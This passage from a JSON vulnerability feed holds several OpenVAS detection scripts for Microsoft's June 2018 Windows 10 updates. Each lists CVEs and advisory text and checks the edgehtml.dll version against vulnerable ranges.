When Microsoft Edge improperly accesses objects in memory.\n\n - When Microsoft Edge improperly handles requests of different origins.\n\n - When Microsoft Edge improperly handles objects in memory.\n\n - When Windows Media Foundation improperly handles objects in memory.\n\n - In the way that the Windows Code Integrity Module performs hashing.\n\n - When Internet Explorer improperly accesses objects in memory.\n\n - When NTFS improperly checks access.\n\n - In the way that the Chakra scripting engine handles objects in memory in\n Microsoft Edge.\n\n - In the way that the scripting engine handles objects in memory in Internet\n Explorer.\n\n - In Windows Domain Name System (DNS) DNSAPI.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, run processes in\n an elevated context, inject code into a trusted PowerShell process, execute\n arbitrary code, read privileged data, force the browser to send restricted data,\n interject cross-process communication, install programs, view, change, or delete\n data or create new accounts with full user rights and create a denial of service\n condition.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4284860\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.17888\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10240.0 - 11.0.10240.17888\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:28:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8216", "CVE-2018-8205", "CVE-2018-1036", "CVE-2018-0982", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8211", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8239", "CVE-2018-8219", "CVE-2018-8169", "CVE-2018-0978", "CVE-2018-8208", "CVE-2018-8217", "CVE-2018-8226", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8209", "CVE-2018-8221", "CVE-2018-8213", "CVE-2018-8234", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8214", "CVE-2018-8225"], "description": "This host is missing a critical security\n update according to 
Microsoft KB4284880", "modified": "2019-12-20T00:00:00", "published": "2018-06-13T00:00:00", "id": "OPENVAS:1361412562310813528", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813528", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4284880)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4284880)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813528\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2018-0978\", \"CVE-2018-0982\", \"CVE-2018-1036\", \"CVE-2018-1040\",\n \"CVE-2018-8169\", \"CVE-2018-8201\", \"CVE-2018-8205\", \"CVE-2018-8207\",\n \"CVE-2018-8208\", \"CVE-2018-8209\", \"CVE-2018-8210\", \"CVE-2018-8211\",\n \"CVE-2018-8212\", \"CVE-2018-8213\", \"CVE-2018-8214\", \"CVE-2018-8215\",\n \"CVE-2018-8216\", \"CVE-2018-8217\", \"CVE-2018-8219\", \"CVE-2018-8221\",\n \"CVE-2018-8225\", \"CVE-2018-8226\", \"CVE-2018-8229\", \"CVE-2018-8231\",\n \"CVE-2018-8234\", \"CVE-2018-8235\", \"CVE-2018-8236\", \"CVE-2018-8239\",\n \"CVE-2018-8251\", \"CVE-2018-8267\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-13 09:07:28 +0530 (Wed, 13 Jun 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4284880)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4284880\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to errors,\n\n - When the Windows kernel improperly handles objects in memory.\n\n - When Windows improperly handles objects in memory.\n\n - When the (Human Interface Device) HID Parser Library driver improperly handles\n objects in 
memory.\n\n - In Device Guard that could allow an attacker to inject malicious code into a\n Windows PowerShell session.\n\n - In Windows when Desktop Bridge does not properly manage the virtual registry.\n\n - When Windows allows a normal user to access the Wireless LAN profile of an\n administrative user.\n\n - In the way that the Windows Code Integrity Module performs hashing.\n\n - When Microsoft Edge improperly handles requests of different origins.\n\n - In the way that the Windows Kernel API enforces permissions.\n\n - When Microsoft Edge improperly handles objects in memory.\n\n - When Microsoft Edge improperly accesses objects in memory.\n\n - When Windows Media Foundation improperly handles objects in memory.\n\n - When the Windows GDI component improperly discloses the contents of its\n memory.\n\n - When Windows Hyper-V instruction emulation fails to properly enforce privilege\n levels.\n\n - When Internet Explorer improperly accesses objects in memory.\n\n - When NTFS improperly checks access.\n\n - In the way that the Chakra scripting engine handles objects in memory in\n Microsoft Edge.\n\n - In the way that the scripting engine handles objects in memory in Internet\n Explorer.\n\n - In Windows Domain Name System (DNS) DNSAPI.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, run processes in\n an elevated context, inject code into a trusted PowerShell process, execute\n arbitrary code, read privileged data, force the browser to send restricted data,\n interject cross-process communication, install programs, view, change, or delete\n data or create new accounts with full user rights and create a denial of service\n condition.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4284880\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.2311\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.14393.0 - 11.0.14393.2311\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8216", "CVE-2018-8205", "CVE-2018-1036", "CVE-2018-0982", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8211", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8239", "CVE-2018-8219", "CVE-2018-8169", "CVE-2018-0978", "CVE-2018-8208", "CVE-2018-8217", "CVE-2018-8226", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8209", "CVE-2018-8221", "CVE-2018-8213", "CVE-2018-8234", "CVE-2018-8121", "CVE-2018-8113", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8227", "CVE-2018-8214", "CVE-2018-8225", "CVE-2018-0871"], 
"description": "This host is missing a critical security\n update according to Microsoft KB4284874", "modified": "2020-06-04T00:00:00", "published": "2018-06-13T00:00:00", "id": "OPENVAS:1361412562310813527", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813527", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4284874)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4284874)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813527\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-0871\", \"CVE-2018-0978\", \"CVE-2018-0982\", \"CVE-2018-1036\",\n \"CVE-2018-1040\", \"CVE-2018-8113\", \"CVE-2018-8121\", \"CVE-2018-8169\",\n \"CVE-2018-8201\", \"CVE-2018-8205\", \"CVE-2018-8207\", \"CVE-2018-8208\",\n \"CVE-2018-8209\", \"CVE-2018-8210\", \"CVE-2018-8211\", \"CVE-2018-8212\",\n \"CVE-2018-8213\", \"CVE-2018-8214\", \"CVE-2018-8215\", \"CVE-2018-8216\",\n \"CVE-2018-8217\", \"CVE-2018-8219\", \"CVE-2018-8221\", \"CVE-2018-8225\",\n \"CVE-2018-8226\", \"CVE-2018-8227\", \"CVE-2018-8229\", \"CVE-2018-8231\",\n \"CVE-2018-8234\", \"CVE-2018-8235\", \"CVE-2018-8236\", \"CVE-2018-8239\",\n \"CVE-2018-8251\", \"CVE-2018-8267\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-13 09:06:23 +0530 (Wed, 13 Jun 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4284874)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4284874\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to errors,\n\n - When the Windows kernel improperly handles objects in memory.\n\n - When Windows improperly handles objects in memory.\n\n - When the 
(Human Interface Device) HID Parser Library driver improperly handles\n objects in memory.\n\n - In Device Guard that could allow an attacker to inject malicious code into a\n Windows PowerShell session.\n\n - In Windows when Desktop Bridge does not properly manage the virtual registry.\n\n - When Windows allows a normal user to access the Wireless LAN profile of an\n administrative user.\n\n - When the Windows kernel improperly initializes objects in memory.\n\n - In the way that the Windows Code Integrity Module performs hashing.\n\n - When Microsoft Edge improperly handles requests of different origins.\n\n - In the way that the Windows Kernel API enforces permissions.\n\n - When Microsoft Edge improperly handles objects in memory.\n\n - When Microsoft Edge improperly accesses objects in memory.\n\n - When Windows Media Foundation improperly handles objects in memory.\n\n - When the Windows GDI component improperly discloses the contents of its\n memory.\n\n - When Windows Hyper-V instruction emulation fails to properly enforce privilege\n levels.\n\n - In Internet Explorer that allows for bypassing Mark of the Web Tagging (MOTW).\n\n - When Internet Explorer improperly accesses objects in memory.\n\n - When NTFS improperly checks access.\n\n - When Edge improperly marks files.\n\n - In the way that the Chakra scripting engine handles objects in memory in\n Microsoft Edge.\n\n - In the way that the scripting engine handles objects in memory in Internet\n Explorer.\n\n - In Windows Domain Name System (DNS) DNSAPI.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, run processes in\n an elevated context, inject code into a trusted PowerShell process, execute\n arbitrary code, read privileged data, force the browser to send restricted data,\n interject cross-process communication, install programs, view, change, or delete\n data or create new accounts with full 
user rights, create a denial of service\n condition and bypass security restrictions.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4284874\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.1154\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.15063.0 - 11.0.15063.1154\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8205", "CVE-2018-1036", "CVE-2018-0982", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8211", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8239", "CVE-2018-8219", "CVE-2018-8169", "CVE-2018-8233", "CVE-2018-0978", "CVE-2018-8208", "CVE-2018-8226", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8110", "CVE-2018-8221", "CVE-2018-8213", 
"CVE-2018-8234", "CVE-2018-8121", "CVE-2018-8113", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8140", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8227", "CVE-2018-8214", "CVE-2018-1003", "CVE-2018-8225", "CVE-2018-0871", "CVE-2018-8175"], "description": "This host is missing a critical security\n update according to Microsoft KB4284835", "modified": "2020-06-04T00:00:00", "published": "2018-06-13T00:00:00", "id": "OPENVAS:1361412562310813530", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813530", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4284835)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4284835)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813530\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-0871\", \"CVE-2018-0978\", \"CVE-2018-0982\", \"CVE-2018-1036\",\n \"CVE-2018-1040\", \"CVE-2018-8110\", \"CVE-2018-8113\", \"CVE-2018-8121\",\n \"CVE-2018-8140\", \"CVE-2018-8169\", \"CVE-2018-8175\", \"CVE-2018-8201\",\n \"CVE-2018-8205\", \"CVE-2018-8207\", \"CVE-2018-8208\", \"CVE-2018-8210\",\n \"CVE-2018-8211\", \"CVE-2018-8212\", \"CVE-2018-8213\", \"CVE-2018-8214\",\n \"CVE-2018-8215\", \"CVE-2018-8219\", \"CVE-2018-8221\", \"CVE-2018-8225\",\n \"CVE-2018-8226\", \"CVE-2018-8227\", \"CVE-2018-8229\", \"CVE-2018-8231\",\n \"CVE-2018-8233\", \"CVE-2018-8234\", \"CVE-2018-8235\", \"CVE-2018-8236\",\n \"CVE-2018-8239\", \"CVE-2018-8251\", \"CVE-2018-8267\", \"CVE-2018-1003\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-13 09:09:57 +0530 (Wed, 13 Jun 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4284835)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4284835\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to errors,\n\n - When the Windows kernel improperly handles objects in memory.\n\n - When Windows improperly handles 
objects in memory.\n\n - When the (Human Interface Device) HID Parser Library driver improperly handles\n objects in memory.\n\n - In Device Guard that could allow an attacker to inject malicious code into a\n Windows PowerShell session.\n\n - In Windows when Desktop Bridge does not properly manage the virtual registry.\n\n - When Cortana retrieves data from user input services without consideration for\n status.\n\n - When the Windows kernel improperly initializes objects in memory.\n\n - In Windows when the Win32k component fails to properly handle objects in\n memory.\n\n - In the way that the Windows Code Integrity Module performs hashing.\n\n - When Microsoft Edge improperly handles requests of different origins.\n\n - In the way that the Windows Kernel API enforces permissions.\n\n - When Microsoft Edge improperly handles objects in memory.\n\n - When Microsoft Edge improperly accesses objects in memory.\n\n - When Windows Media Foundation improperly handles objects in memory.\n\n - When the Windows GDI component improperly discloses the contents of its\n memory.\n\n - When Windows Hyper-V instruction emulation fails to properly enforce privilege\n levels.\n\n - When Windows NT WEBDAV Minirdr attempts to query a WEBDAV directory.\n\n - In Internet Explorer that allows for bypassing Mark of the Web Tagging (MOTW).\n\n - When Internet Explorer improperly accesses objects in memory.\n\n - When NTFS improperly checks access.\n\n - When Edge improperly marks files.\n\n - In the way that the Chakra scripting engine handles objects in memory in\n Microsoft Edge.\n\n - In the way that the scripting engine handles objects in memory in Internet\n Explorer.\n\n - In Windows Domain Name System (DNS) DNSAPI.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, run processes in\n an elevated context, inject code into a trusted PowerShell process, execute\n arbitrary code, 
read privileged data, force the browser to send restricted data,\n interject cross-process communication, install programs, view, change, or delete\n data or create new accounts with full user rights and create a denial of service\n condition.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1803 x32/x64-bit Systems.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4284835\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.17134.0\", test_version2:\"11.0.17134.111\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.17134.0 - 11.0.17134.111\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8205", "CVE-2018-1036", "CVE-2018-0982", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8211", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8239", "CVE-2018-8219", 
"CVE-2018-8169", "CVE-2018-0978", "CVE-2018-8208", "CVE-2018-8226", "CVE-2018-8218", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8209", "CVE-2018-8221", "CVE-2018-8213", "CVE-2018-8234", "CVE-2018-8121", "CVE-2018-8113", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8140", "CVE-2018-8111", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8227", "CVE-2018-8214", "CVE-2018-8225", "CVE-2018-0871", "CVE-2018-8175"], "description": "This host is missing a critical security\n update according to Microsoft KB4284819", "modified": "2020-06-04T00:00:00", "published": "2018-06-13T00:00:00", "id": "OPENVAS:1361412562310813526", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813526", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4284819)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4284819)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813526\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-0871\", \"CVE-2018-0978\", \"CVE-2018-0982\", \"CVE-2018-1036\",\n \"CVE-2018-1040\", \"CVE-2018-8111\", \"CVE-2018-8113\", \"CVE-2018-8121\",\n \"CVE-2018-8140\", \"CVE-2018-8169\", \"CVE-2018-8175\", \"CVE-2018-8201\",\n \"CVE-2018-8205\", \"CVE-2018-8207\", \"CVE-2018-8208\", \"CVE-2018-8209\",\n \"CVE-2018-8210\", \"CVE-2018-8211\", \"CVE-2018-8212\", \"CVE-2018-8213\",\n \"CVE-2018-8214\", \"CVE-2018-8215\", \"CVE-2018-8218\", \"CVE-2018-8219\",\n \"CVE-2018-8221\", \"CVE-2018-8225\", \"CVE-2018-8226\", \"CVE-2018-8227\",\n \"CVE-2018-8229\", \"CVE-2018-8231\", \"CVE-2018-8234\", \"CVE-2018-8235\",\n \"CVE-2018-8236\", \"CVE-2018-8239\", \"CVE-2018-8251\", \"CVE-2018-8267\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-13 09:05:09 +0530 (Wed, 13 Jun 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4284819)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4284819\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to errors,\n\n - When the Windows kernel improperly handles objects in memory.\n\n - When Windows improperly handles 
objects in memory.\n\n - When the (Human Interface Device) HID Parser Library driver improperly handles\n objects in memory.\n\n - In Device Guard that could allow an attacker to inject malicious code into a\n Windows PowerShell session.\n\n - In Windows when Desktop Bridge does not properly manage the virtual registry.\n\n - When Windows allows a normal user to access the Wireless LAN profile of an\n administrative user.\n\n - When Cortana retrieves data from user input services without consideration for\n status.\n\n - When the Windows kernel improperly initializes objects in memory.\n\n - In the way that the Windows Code Integrity Module performs hashing.\n\n - When Microsoft Edge improperly handles requests of different origins.\n\n - In the way that the Windows Kernel API enforces permissions.\n\n - When Microsoft Edge improperly handles objects in memory.\n\n - When Microsoft Edge improperly accesses objects in memory.\n\n - When Windows Media Foundation improperly handles objects in memory.\n\n - When HTTP Protocol Stack (Http.\n\n - When the Windows GDI component improperly discloses the contents of its\n memory.\n\n - When Windows Hyper-V instruction emulation fails to properly enforce privilege\n levels.\n\n - When Windows NT WEBDAV Minirdr attempts to query a WEBDAV directory.\n\n - When Microsoft Hyper-V Network Switch on a host server fails to properly\n validate input from a privileged user on a guest operating system.\n\n - In Internet Explorer that allows for bypassing Mark of the Web Tagging (MOTW).\n\n - When Internet Explorer improperly accesses objects in memory.\n\n - When NTFS improperly checks access.\n\n - When Edge improperly marks files.\n\n - In the way that the Chakra scripting engine handles objects in memory in\n Microsoft Edge.\n\n - In the way that the scripting engine handles objects in memory in Internet\n Explorer.\n\n - In Windows Domain Name System (DNS) DNSAPI.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation 
will allow an attacker\n to obtain information to further compromise the user's system, run processes in\n an elevated context, inject code into a trusted PowerShell process, execute\n arbitrary code, read privileged data, force the browser to send restricted data,\n interject cross-process communication, install programs, view, change, or delete\n data or create new accounts with full user rights and create a denial of service\n condition.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1709 for x32/x64-bit Systems.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4284819\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, 